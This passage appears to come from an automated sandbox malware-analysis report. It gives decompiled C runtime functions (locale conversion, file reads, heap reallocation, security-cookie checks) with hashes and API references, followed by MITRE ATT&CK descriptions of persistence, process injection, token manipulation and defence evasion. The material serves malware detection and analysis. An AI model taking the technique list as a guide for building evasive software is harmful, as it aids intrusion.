Part of subcall function 004030C1: DeleteCriticalSection.KERNEL32(pKA,?,?,0040305E,0040157E,00411EA0,00000014), ref: 0040442A

__calloc_crt.LIBCMT ref: 0040307E
__initptd.LIBCMT ref: 004030A0
GetCurrentThreadId.KERNEL32 ref: 004030A7

Memory Dump Source

Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 8f3acd18d51e263f485451ab3dc762e6cf44a6e123e8e9d85ed5d8a7ab98aedc
Instruction ID: 2115b65a6a9c202ad142230a1a1e4feb1784a8349ca752f000b05186f7d9f433
Opcode Fuzzy Hash: 8f3acd18d51e263f485451ab3dc762e6cf44a6e123e8e9d85ed5d8a7ab98aedc
Instruction Fuzzy Hash: 49F06D3216A6112DE6387F766C07A4B2E9C8F01B7AF20463FF560B51D6EE398A81419C

Uniqueness

Uniqueness Score: -1.00%

Function 0040916C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040916C(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00405DA9( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00409121( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E004024C9();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004091A2
__isleadbyte_l.LIBCMT ref: 004091D0
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 004091FE
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00409234

Strings

.\@, xrefs: 0040916C

Memory Dump Source

Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID: .\@
API String ID: 3058430110-2906710320
Opcode ID: a3a2b69d6d2b9a4b6c28d472179e9680dc856bfc5fdc6e53166ac95398402672
Instruction ID: de8054beb32b7dc64be8669cb2ea50c94ab5c5166fc26728190ff957983d3686
Opcode Fuzzy Hash: a3a2b69d6d2b9a4b6c28d472179e9680dc856bfc5fdc6e53166ac95398402672
Instruction Fuzzy Hash: 0A31A130604206BFEB218E65CC48BAB7BA5FF41310F15487EE864AB2D2D738DC51DB99

Uniqueness

Uniqueness Score: -1.00%

Function 004011BC Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E004011BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00401B60(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00401829(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00401B60(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E004024C9())) = 0x22;
												L4:
												E004017EE();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E0040194A(_t119));
											_t88 = E00401D04();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00401ADE(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E004024C9())) = 0x16;
				goto L4;
			}

APIs

_memset.LIBCMT ref: 0040121A
_memcpy_s.LIBCMT ref: 0040128C
__read_nolock.LIBCMT ref: 004012EA
__filbuf.LIBCMT ref: 0040130D
_memset.LIBCMT ref: 00401351

Part of subcall function 004024C9: __getptd_noexit.LIBCMT ref: 004024C9

Memory Dump Source

Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 5112d85f97c71c139c9da0b529e63dbc9639d42f3f555ff927f58fbeb55d1acd
Instruction ID: cf3cdffc9f5a22b3a5bc0b0a3e7c0e9796cf8811e6014f552bdcdaa456813bfd
Opcode Fuzzy Hash: 5112d85f97c71c139c9da0b529e63dbc9639d42f3f555ff927f58fbeb55d1acd
Instruction Fuzzy Hash: 2451D430A00205DBDB248EAAC88466F77A5AF44320F24877FF825F66E0D7789E519B49

Uniqueness

Uniqueness Score: -1.00%

Function 00408075 Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00408075(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x414224, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x415060 == _t7) {
									_t9 = E004024C9();
									 *_t9 = E004024DC(GetLastError());
									goto L17;
								} else {
									if(E00406D05(_t7, _t31) == 0) {
										_t12 = E004024C9();
										 *_t12 = E004024DC(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00406D05(_t6, _t31);
						 *((intOrPtr*)(E004024C9())) = 0xc;
						goto L12;
					} else {
						E00404535(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00407FE3(__ebx, __edx, __edi, _a8);
				}
			}

APIs

_malloc.LIBCMT ref: 00408081

Part of subcall function 00407FE3: __FF_MSGBANNER.LIBCMT ref: 00407FFA
Part of subcall function 00407FE3: __NMSG_WRITE.LIBCMT ref: 00408001
Part of subcall function 00407FE3: RtlAllocateHeap.NTDLL(007B0000,00000000,00000001,00000000,00000000,00000000,?,004045CB,00000000,00000000,00000000,00000000,?,00404480,00000018,00411FD8), ref: 00408026

_free.LIBCMT ref: 00408094

Memory Dump Source

Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 203b7c5fc3a61a23da61efa24fa73c8b6d154fd32cc8f013885648f5e2350aaa
Instruction ID: 9f8fe8c4bbd9e52b1c20aa057dcece5d638b265e9f3ef175acddb1746402e183
Opcode Fuzzy Hash: 203b7c5fc3a61a23da61efa24fa73c8b6d154fd32cc8f013885648f5e2350aaa
Instruction Fuzzy Hash: 2E110A32504215ABCB202F76FE0966B37A46F44364F11893FF989BA2D0DF7C8885C69C

Uniqueness

Uniqueness Score: -1.00%

Function 004030DE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 16%

			E004030DE(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}

0x004030e2
0x004030ed
0x004030f5
0x004030ff
0x00403107
0x00000000
0x0040310c
0x00403107
0x00403111

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,0040311D,00000000,?,00408010,000000FF,0000001E,00000000,00000000,00000000,?,004045CB), ref: 004030ED
GetProcAddress.KERNEL32(?,CorExitProcess), ref: 004030FF

Strings

CorExitProcess, xrefs: 004030F7
mscoree.dll, xrefs: 004030E6

Memory Dump Source

Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: e41157a03b6b2c61028faa385d86cc0ba5d050f528bde22708dc0c239dc5d6e7
Instruction ID: 7a72415fad87126f0e2fa5a039a0ddc386d1adc0ae7252d34b4d1e54dfdeeb3d
Opcode Fuzzy Hash: e41157a03b6b2c61028faa385d86cc0ba5d050f528bde22708dc0c239dc5d6e7
Instruction Fuzzy Hash: 48D0123034020CBBEB109F93DE05F5A7EADDB08742F10097ABD08F51D1DA75EA309669

Uniqueness

Uniqueness Score: -1.00%

Function 0040A93D Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040A93D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0040AE8E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0040A9C3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0040B109(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0040B048(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 0040A961

Part of subcall function 0040B048: __fltout2.LIBCMT ref: 0040B071

__cftog_l.LIBCMT ref: 0040A987
__cftoe_l.LIBCMT ref: 0040A9B9

Memory Dump Source

Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: b85d4b3049c9008af4f0c0b863223919110253e8b4ae8400fcd67ebda280d961
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 370142B214024DBBCF125E85CC11CEE3F26BF18354B598826FE1868171D33AC971AB86

Uniqueness

Uniqueness Score: -1.00%

Function 0040412D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0040412D(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t9;
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				signed int _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;
				void* _t35;

				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t35 = _t23 -  *0x413500; // 0x9c05bbfe
				if(_t35 == 0) {
					asm("repe ret");
				}
				_t30 = _t32;
				_t9 = IsProcessorFeaturePresent(0x17);
				if(_t9 != 0) {
					_t23 = 2;
					asm("int 0x29");
				}
				 *0x414e30 = _t9;
				 *0x414e2c = _t23;
				 *0x414e28 = _t26;
				 *0x414e24 = _t22;
				 *0x414e20 = _t28;
				 *0x414e1c = _t27;
				 *0x414e48 = ss;
				 *0x414e3c = cs;
				 *0x414e18 = ds;
				 *0x414e14 = es;
				 *0x414e10 = fs;
				 *0x414e0c = gs;
				asm("pushfd");
				_pop( *0x414e40);
				 *0x414e34 =  *_t30;
				 *0x414e38 = _v0;
				 *0x414e44 =  &_a4;
				 *0x414d80 = 0x10001;
				_t14 =  *0x414e38; // 0x0
				 *0x414d3c = _t14;
				 *0x414d30 = 0xc0000409;
				 *0x414d34 = 1;
				 *0x414d40 = 1;
				_t15 = 4;
				 *((intOrPtr*)(0x414d44 + _t15 * 0)) = 2;
				_t17 = 4;
				_t24 =  *0x413500; // 0x9c05bbfe
				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
				_t19 = 4;
				_t25 =  *0x413504; // 0x63fa4401
				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
				return E0040738B(_t19 << 0, "0MA");
			}

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004073D3
___raise_securityfailure.LIBCMT ref: 004074BA

Strings

0MA, xrefs: 004074B5

Memory Dump Source

Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 0MA
API String ID: 3761405300-2670099660
Opcode ID: 10687dbb931aabde788e87b565521ef1de1769e34277da068579617722567ceb
Instruction ID: 4d7014942219b6f5ceedf13c626a08c3852bc8b33df36f437cf18d2bd91ecdc5
Opcode Fuzzy Hash: 10687dbb931aabde788e87b565521ef1de1769e34277da068579617722567ceb
Instruction Fuzzy Hash: A521F0B5550304DBEB11DF55FE81A907BA4BB88710F14D03AE9089B7A0E3B95A91CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040196E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040196E() {
				intOrPtr _t3;
				intOrPtr _t4;
				void* _t6;
				intOrPtr _t9;
				void* _t12;
				intOrPtr _t13;

				_t3 =  *0x416124;
				_t13 = 0x14;
				if(_t3 != 0) {
					if(_t3 < _t13) {
						_t3 = _t13;
						goto L4;
					}
				} else {
					_t3 = 0x200;
					L4:
					 *0x416124 = _t3;
				}
				_t4 = E0040456D(_t3, 4);
				 *0x416120 = _t4;
				if(_t4 != 0) {
					L8:
					_t12 = 0;
					_t9 = 0x413008;
					while(1) {
						 *((intOrPtr*)(_t12 + _t4)) = _t9;
						_t9 = _t9 + 0x20;
						_t12 = _t12 + 4;
						if(_t9 >= 0x413288) {
							break;
						}
						_t4 =  *0x416120;
					}
					return 0;
				} else {
					 *0x416124 = _t13;
					_t4 = E0040456D(_t13, 4);
					 *0x416120 = _t4;
					if(_t4 != 0) {
						goto L8;
					} else {
						_t6 = 0x1a;
						return _t6;
					}
				}
			}

APIs

__calloc_crt.LIBCMT ref: 00401990
__calloc_crt.LIBCMT ref: 004019A9

Strings

QA, xrefs: 004019C0

Memory Dump Source

Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd

Similarity

API ID: __calloc_crt
String ID: QA
API String ID: 3494438863-1702331105
Opcode ID: e61353a67c3b75d03766be3be1206ce3dbc83965c3f1a3ac28e3a870fa1f8643
Instruction ID: 3e9ddad1e3de1c0e95620cbe28ab7805e9b9329235e72186096bcbda3288e2ad
Opcode Fuzzy Hash: e61353a67c3b75d03766be3be1206ce3dbc83965c3f1a3ac28e3a870fa1f8643
Instruction Fuzzy Hash: 27F0C8F1345201AAF714CB65BD516D56FE5E748724F21413FE640EA2E5E338C841C74C

Uniqueness

Uniqueness Score: -1.00%

Function 004017C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,004017FA,00000000,00000000,00000000,00000000,00000000,00403C29,?,004039CE,00000003,00407FFF,00000000,00000000,00000000), ref: 004017CC
__invoke_watson.LIBCMT ref: 004017E8

Strings

0Kw, xrefs: 004017CC

Memory Dump Source

Source File: 00000011.00000002.347018742.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.347013096.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347029407.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000011.00000002.347036766.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_ltqmdmdi.jbxd

Similarity

API ID: DecodePointer__invoke_watson
String ID: 0Kw
API String ID: 4034010525-1246214110
Opcode ID: d2e17d451a76cd75420c9187795bf27789629b420142b2d469eafdd2ab0cb3f0
Instruction ID: c97e1cab28a9a0a5774540a9f45a6d0117cf2650b7669a4f547a1e58f4d2c784
Opcode Fuzzy Hash: d2e17d451a76cd75420c9187795bf27789629b420142b2d469eafdd2ab0cb3f0
Instruction Fuzzy Hash: 99E0EC35110109BBDF022F62DD098AA3A69BB14754B404435FE0092571DA37C971ABA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
